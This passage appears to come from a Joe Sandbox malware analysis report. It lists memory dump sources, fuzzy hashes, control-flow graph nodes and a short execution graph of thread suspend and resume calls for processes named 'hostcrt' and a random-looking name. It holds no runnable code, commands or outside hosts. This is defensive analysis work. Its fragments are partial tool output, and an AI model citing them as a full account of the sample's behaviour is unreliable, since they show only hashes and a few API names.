                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c33571887370a04c3c2192cd6713f690321da1b1fbfa6f9e338955103ea88e4d
                                                            • Instruction ID: 7300aabedb64465a234f1c34340587b1befbc2006af557539461c08545dd76f2
                                                            • Opcode Fuzzy Hash: c33571887370a04c3c2192cd6713f690321da1b1fbfa6f9e338955103ea88e4d
                                                            • Instruction Fuzzy Hash: C432A831B58A1A8FDBA8EB58C8659B877F1FF54310F1041B9E01DD7292DE24AC85CB85

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b7799b2c32c1653d09e8caac64e7f72a04a861a8c613b5aeb0cb8a81022e6ff2
                                                            • Instruction ID: 51606e264a1f568cc5b03fa2c6405ffef35aa4e64579761a820ce2704ae88ffb
                                                            • Opcode Fuzzy Hash: b7799b2c32c1653d09e8caac64e7f72a04a861a8c613b5aeb0cb8a81022e6ff2
                                                            • Instruction Fuzzy Hash: 1CD12B23B4DA8B4FD7A5EB6884746B877F1EF99390B0901B7E04DD72D2DE18AC058345

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1c2deb9d9dc78cc09a79555f119dae011116589478202343bb2a376dad679c9a
                                                            • Instruction ID: 48445087dc80a59c7643b3d830e40a8e0f14697bc4e2fc2cc268a70ec5ce50b5
                                                            • Opcode Fuzzy Hash: 1c2deb9d9dc78cc09a79555f119dae011116589478202343bb2a376dad679c9a
                                                            • Instruction Fuzzy Hash: 2ED1F531A4CB478FD378EB68D0A65B577F1FF48340B9045BEE44AC3692DE29B8418785

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e7554709b2830b81531c0aba9f779a6257876e42a24c1637f57d2c6248201208
                                                            • Instruction ID: 99f6a1490341b932c75772ab3aa636f0ff6c4a0c99417e33f00e03afe39fdc8d
                                                            • Opcode Fuzzy Hash: e7554709b2830b81531c0aba9f779a6257876e42a24c1637f57d2c6248201208
                                                            • Instruction Fuzzy Hash: A3D1D3316585468FEB69DF48C4E15B037B1FF49390B5442BDD85B8B68ACA38F881CB89

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 52737b18c2f2e168d4dc4656c0147240192235426c4c9ec80be863f28888ed34
                                                            • Instruction ID: 80dca16e084f7d35e190200b86c814730f05ec128a45f399221733589a367996
                                                            • Opcode Fuzzy Hash: 52737b18c2f2e168d4dc4656c0147240192235426c4c9ec80be863f28888ed34
                                                            • Instruction Fuzzy Hash: 9AC1D1316585468BEB2DDF48C4E15B137B1FF45380B5446BDE85B8B68BCA38F881CB89

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f2c275009bf686603720517b474ea01d3e93bad3af24ad287e11c890f944e40
                                                            • Instruction ID: ea0945322039686f7935dfe2a0a9e6eea3b68262dfc9a51c08383df1df6fd6ae
                                                            • Opcode Fuzzy Hash: 7f2c275009bf686603720517b474ea01d3e93bad3af24ad287e11c890f944e40
                                                            • Instruction Fuzzy Hash: A9B1D431B58A478FE759EB58C0A16B4B7B1FF59380F544179E04EC7A86CB28F861CB84

                                                            Control-flow Graph

                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1826966376.00007FFD9BD10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BD10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bd10000_hostcrt.jbxd
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b6cd77291fbf76f8de0c19170ebfa6b342ad0b885ac6be5c62c3ecfe871f04c7
                                                            • Instruction ID: 12bf37f953fde662f2d6f8c4b82061882e6d41a822b5fe2410c70500d836fcb2
                                                            • Opcode Fuzzy Hash: b6cd77291fbf76f8de0c19170ebfa6b342ad0b885ac6be5c62c3ecfe871f04c7
                                                            • Instruction Fuzzy Hash: DB313472B5890A9FEB54EF58C4A19A9F3B2FF54750B108139E01EE3681CF24BC12CB84
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 602e3ba0f1fc4c0b09b4918675dbb673dc74875f3277b651386948e327463451
                                                            • Instruction ID: 25daf421b6e6a4781772e3878ec851001f943e0138921fac9f8f81c8145268ea
                                                            • Opcode Fuzzy Hash: 602e3ba0f1fc4c0b09b4918675dbb673dc74875f3277b651386948e327463451
                                                            • Instruction Fuzzy Hash: B8312832E8C54FCAEB78EB9484619FD77B1FF44380F50017AE41EE6581CA38E9609B59
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 15700550777b7500937a1b7bd772ddf112c633fe3e8f65cdfdcc0c9326e4c2c6
                                                            • Instruction ID: abfacbdfe97b4d1251c1a40d112dd7f01ad46951f25f87f4cd7596cb180fb27f
                                                            • Opcode Fuzzy Hash: 15700550777b7500937a1b7bd772ddf112c633fe3e8f65cdfdcc0c9326e4c2c6
                                                            • Instruction Fuzzy Hash: 3E3199B0A0852D8ECFA8DF14C855BAAB7B1FB68315F1041EE910EE32A5DB755A80CF45
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0f3dc9fce901f8219f2829c0536d05623a5e2dce0ae53c35bf198e20f445ddb8
                                                            • Instruction ID: 9153134f9dfa8bf451b1189f0b449de1a58f80c8282f65c310b6d92c9bd43417
                                                            • Opcode Fuzzy Hash: 0f3dc9fce901f8219f2829c0536d05623a5e2dce0ae53c35bf198e20f445ddb8
                                                            • Instruction Fuzzy Hash: 8E314712A5C5A74EF339935888715B47F71EF9239071882FAE08ADF4DBC53CB8858345
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1e427542b0f9c0264a1a8eb8d8994979b3c16032e1927b10a1803fa9f34010e1
                                                            • Instruction ID: 0d8d5d10276f7cdaff5d1f55fc80d1db7ecd7156e4dc94a042ef27587dd567ab
                                                            • Opcode Fuzzy Hash: 1e427542b0f9c0264a1a8eb8d8994979b3c16032e1927b10a1803fa9f34010e1
                                                            • Instruction Fuzzy Hash: FA212B31A0891D8FDF98EB58C8A5AEDB3B1FF58310F4041AEE04EE3291CE35A940CB40
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c027575d4c4471ac96d9ccd4660b05436297f550c7aac211652148ca6092195f
                                                            • Instruction ID: 91c664e84dbea6b181f84e425be689aa201eecf13cdd867fe93e78e5029d660e
                                                            • Opcode Fuzzy Hash: c027575d4c4471ac96d9ccd4660b05436297f550c7aac211652148ca6092195f
                                                            • Instruction Fuzzy Hash: 7B21FB71A1491D8FDFA8EB58C465AADB7B1FF68310F1041AEE00EE3291CA35A941CB44
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c1a2d83e25641d1a2bc0ea1e256bd12e4c341ca0551e5a2bd4bac84567b0a3e4
                                                            • Instruction ID: 78bdf2408ba9ef186462e94f085131825fb3709134425accca3817cdecb6a6d0
                                                            • Opcode Fuzzy Hash: c1a2d83e25641d1a2bc0ea1e256bd12e4c341ca0551e5a2bd4bac84567b0a3e4
                                                            • Instruction Fuzzy Hash: 6B31D135B0E68E8BEB21AF64CC206F9BBA0EF51351F1502BAD55C831E1DFB86644CB41
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 35dda20673d99fe45ead1b319985014a475a0f78972d8068fbc86c4a95f400ca
                                                            • Instruction ID: 5552e3d5d79fbbd94aba09b91fa4510d4242b62866e4f616faaecf8190703683
                                                            • Opcode Fuzzy Hash: 35dda20673d99fe45ead1b319985014a475a0f78972d8068fbc86c4a95f400ca
                                                            • Instruction Fuzzy Hash: 0921C336B0E68D8BE731B7A8DC112FD7760EF92321F010277C155971E2DA742209CB85
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f4dd5e4c3caf1744188e1ccafd8db2f5a8fffc12c9ab1d4295a40f1dee1089c
                                                            • Instruction ID: 7fea7dff472d1b7896ca052639e9f296fa6d245ff0f4843479b1e5a92ad7ebe4
                                                            • Opcode Fuzzy Hash: 7f4dd5e4c3caf1744188e1ccafd8db2f5a8fffc12c9ab1d4295a40f1dee1089c
                                                            • Instruction Fuzzy Hash: 0331D470E0952D8EEBB4EB54C8656F8B2B1EF54301F1506FA900DE32A1DFB95BD08E48
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1ecf5d706bb48d3f1e21232fea8febfb654e4bdcf1de5aa3beda3319d82d1ec4
                                                            • Instruction ID: 1cb8a6b237c52c0fd8e5501a07af244957881942a8ad21f4bdae32456aa64e5e
                                                            • Opcode Fuzzy Hash: 1ecf5d706bb48d3f1e21232fea8febfb654e4bdcf1de5aa3beda3319d82d1ec4
                                                            • Instruction Fuzzy Hash: E321E730A1491D8FDB94FBA8C8989BDB7F1FF28304B11056AD419D72A5DF75A981CB40
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5b6cd1f4b4c9396ccbe3466754859e1005f58e54d7112cd8a64abf8958712eea
                                                            • Instruction ID: 4cf24bec1e2e6a0bda878f99124afa4856cc69ee715b62166eb0f160ec68172c
                                                            • Opcode Fuzzy Hash: 5b6cd1f4b4c9396ccbe3466754859e1005f58e54d7112cd8a64abf8958712eea
                                                            • Instruction Fuzzy Hash: 57213B11A6C46F87F738D28884715B47A61EF90740B1486FAE44B9B48BCC3CB9818344
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3352f4ccd43179fca4b0b788b038980f45765702f5c4d07fb3a8a64a4a23a247
                                                            • Instruction ID: cb7ab85281b02c3ad4b79cc54534d15d5c081793be803a997d7057b4cab1e15d
                                                            • Opcode Fuzzy Hash: 3352f4ccd43179fca4b0b788b038980f45765702f5c4d07fb3a8a64a4a23a247
                                                            • Instruction Fuzzy Hash: 1D11DD53F8E1938BF239F6E418712BC66309F647E0F1802BAF84EE61C2DC0C2C45529A
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7e73866ef4024b2f42af0a591ad23fe3aff6f98d922debbe46da8557994334e
                                                            • Instruction ID: 8aeaab911f3623bab50465b9c824b5821c226b89079fac868d0e2637a8caba8d
                                                            • Opcode Fuzzy Hash: c7e73866ef4024b2f42af0a591ad23fe3aff6f98d922debbe46da8557994334e
                                                            • Instruction Fuzzy Hash: 5111E411A6C42F87F738E28884715B47661EF94751B2486FAE44B9B48FCD3CB9819385
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2141e72720c1c3c1cfa8242d57643b0fa970cbb98ef6778087df4bf3fe18061d
                                                            • Instruction ID: 3919b1c6733083ede479eef0ed360227e5f148b994f2ae445e9bfb82aaadff5e
                                                            • Opcode Fuzzy Hash: 2141e72720c1c3c1cfa8242d57643b0fa970cbb98ef6778087df4bf3fe18061d
                                                            • Instruction Fuzzy Hash: 41115931B0E64E8BE721BBA8D8212FD7760EF51310F014677D1559B2E2DE7822058B84
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 42e7845fdf54c9394e3df90c32b58d9feb71ae81d491016eba410a3e1a02ebf6
                                                            • Instruction ID: 47d36ecb51ea8d4173ede59a570dd7f479da5f434d44a111f972de81436564c1
                                                            • Opcode Fuzzy Hash: 42e7845fdf54c9394e3df90c32b58d9feb71ae81d491016eba410a3e1a02ebf6
                                                            • Instruction Fuzzy Hash: F511E721B18A094FDB69EB64A4215FE7390FF94315B50077ED08AC30D2CF28A61A87C0
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3c8760d0a7ee62e87e56dd4beac32e78eda62ab63a82110e94b4370b4a95fd56
                                                            • Instruction ID: 8d80a31fee68165faf2dc9243d2b0ca8aec571fca4e191907beb1b71aa66772c
                                                            • Opcode Fuzzy Hash: 3c8760d0a7ee62e87e56dd4beac32e78eda62ab63a82110e94b4370b4a95fd56
                                                            • Instruction Fuzzy Hash: C3119422A58E0A8FDB65FB6494656F973E1FF94355B10477EE08AD30D2CE29E90683C0
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 253d0d8c25c68f0400e0028c8e07477230c743b86796c712b8e76fefb4828e73
                                                            • Instruction ID: 935063bf349832b417d173df3978b23441eb9553dc49d69f21369e26f93164b7
                                                            • Opcode Fuzzy Hash: 253d0d8c25c68f0400e0028c8e07477230c743b86796c712b8e76fefb4828e73
                                                            • Instruction Fuzzy Hash: F9112B32358A0A8FE715EA5CE4543F97390FB95325F20437FD946C31D0CB66A95287C0
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 548464d7092298f7fcab7e44ce20dc631bc2fb862f728a1741ee62fa42178abf
                                                            • Instruction ID: 000604d660d371ee19ee280dc13fa02be68369cdc8495ed63434075edfde719b
                                                            • Opcode Fuzzy Hash: 548464d7092298f7fcab7e44ce20dc631bc2fb862f728a1741ee62fa42178abf
                                                            • Instruction Fuzzy Hash: 8F11663238C64A4FE71ADA68E4243E87790EB85364F20037FD949C31D0CB25A66687C0
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1833214224.00007FFD9C1C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9c1c0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1578cd98cbf3f08d3bb5a9e2dc5ba291dff6529c8ee4e4625dde455f9eb4290e
                                                            • Instruction ID: 316d4587aad20c967c85277795e096be4ea6cfb2799d794c5c68e49538cf5be2
                                                            • Opcode Fuzzy Hash: 1578cd98cbf3f08d3bb5a9e2dc5ba291dff6529c8ee4e4625dde455f9eb4290e
                                                            • Instruction Fuzzy Hash: B701D232F08A4B5BF770B6A884682BE76B1DF45380F10057AF00BF7192DE69A8068785
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 48b71a4939b93e3734629cf06c25fe499545c203b0ce2f9267f5a936c466a930
                                                            • Instruction ID: 53a645df64a4d8510af1f98e0592610902f22900bad85c9cc6bf1c5f0f56d139
                                                            • Opcode Fuzzy Hash: 48b71a4939b93e3734629cf06c25fe499545c203b0ce2f9267f5a936c466a930
                                                            • Instruction Fuzzy Hash: EE116631B0E68E8BE721FBA8C8212FD7760EF41310F014676D155AB2E2CE782209CB84
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1824511024.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffd9bac0000_hostcrt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:

                                                            Execution Graph

                                                            Execution Coverage:4.1%
                                                            Dynamic/Decrypted Code Coverage:33.3%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:12
                                                            Total number of Limit Nodes:0
                                                            execution_graph
                                                            • 28308 7ffd9bc7d6bd 28309 7ffd9bc7d6cb SuspendThread 28308->28309 28311 7ffd9bc7d7a4 28309->28311
                                                            • 28312 7ffd9bc7edfc 28313 7ffd9bc7ee33 ResumeThread 28312->28313 28315 7ffd9bc7ef04 28313->28315
                                                            • 28304 7ffd9bc7ef59 28305 7ffd9bc7ef67 FindCloseChangeNotification 28304->28305 28307 7ffd9bc7f044 28305->28307
                                                            • 28300 7ffd9bc80ba5 28301 7ffd9bc80bbf GetFileAttributesW 28300->28301 28303 7ffd9bc80c85 28301->28303

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4240702182.00007FFD9C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C410000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9c410000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ^A9$^F9$^K9$^P9$^U9
                                                            • API String ID: 0-197665077
                                                            • Opcode ID: 7bf405c34d348f122a7651c16ccc6d989576d10987410371fecdf269c43c2b2d
                                                            • Instruction ID: 391666a9555b39d6a23d4656d33a33f90239e92d73ec1355a940be13986d942e
                                                            • Opcode Fuzzy Hash: 7bf405c34d348f122a7651c16ccc6d989576d10987410371fecdf269c43c2b2d
                                                            • Instruction Fuzzy Hash: 0F419130F0C51A8FEB64EB148865BA977B0EF68319F4001FAD05DE7295DE39A985CF81

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 34 7ffd9bad0b47-7ffd9bad0b49 35 7ffd9bad0b4b-7ffd9bad0b62 34->35 36 7ffd9bad0b84-7ffd9bae7e21 34->36 35->36 38 7ffd9bae7e28-7ffd9bae7e40 36->38 39 7ffd9bae7e23 36->39 40 7ffd9bae7e46-7ffd9bae7e51 38->40 39->38
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4221642207.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bad0000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9
                                                            • API String ID: 0-3254877420
                                                            • Opcode ID: fcf26b013bf8264b5778622fc6e3c703278fbca1aec745ba607a6dde5134c84f
                                                            • Instruction ID: 5cbe41d563a90c29ae8f328b12cf2d3e1ca6e6316115b2b1c980b7446f5820ed
                                                            • Opcode Fuzzy Hash: fcf26b013bf8264b5778622fc6e3c703278fbca1aec745ba607a6dde5134c84f
                                                            • Instruction Fuzzy Hash: 1811D332A2864D8FCB45DF5CD8555E9B7A0FF55325F1102BAE84DD3261C330A965CBC1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 41 7ffd9bc7edfc-7ffd9bc7ee31 42 7ffd9bc7ee34-7ffd9bc7ef02 ResumeThread 41->42 43 7ffd9bc7ee33 41->43 47 7ffd9bc7ef04 42->47 48 7ffd9bc7ef0a-7ffd9bc7ef54 42->48 43->42 47->48
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4225124958.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bc70000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 190ce302e5b76c4223787ceab72f730485d47fa001552daadfdc064ff844e3ca
                                                            • Instruction ID: 920e1f1169eb07a561e830610bc8365415dad356b36eb31a593d423228a2f05f
                                                            • Opcode Fuzzy Hash: 190ce302e5b76c4223787ceab72f730485d47fa001552daadfdc064ff844e3ca
                                                            • Instruction Fuzzy Hash: 4E517B7090D78C8FDB55DFA8C894AE9BFF0EF1A310F0441ABD049DB692DA349846CB51

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.4225124958.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ffd9bc70000_COBPewMCbcSeQUSyEIOt.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseFindNotification
                                                            • String ID:
                                                            • API String ID: 2591292051-0
                                                            • Opcode ID: eb483597fc94340a002277024e56fdc1a7c6d276ea26ccbbc2b310519af6c8a3
                                                            • Instruction ID: c07b1dc5b1fc6f628ba30555940423da8d64d6ff5886f135fa5ad04c35ec9c18
                                                            • Opcode Fuzzy Hash: eb483597fc94340a002277024e56fdc1a7c6d276ea26ccbbc2b310519af6c8a3
                                                            • Instruction Fuzzy Hash: E4415D70D0865C8FDB59DFA8C895BEDBBF0EF5A310F1041AAD449D7292DA349885CB41

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 61 7ffd9bc7d6bd-7ffd9bc7d6c9 62 7ffd9bc7d6d4-7ffd9bc7d7a2 SuspendThread 61->62 63 7ffd9bc7d6cb-7ffd9bc7d6d3 61->63 67 7ffd9bc7d7a4 62->67 68 7ffd9bc7d7aa-7ffd9bc7d7f4 62->68 63->62 67->68
                                                            APIs
                                                            Memory Dump Source
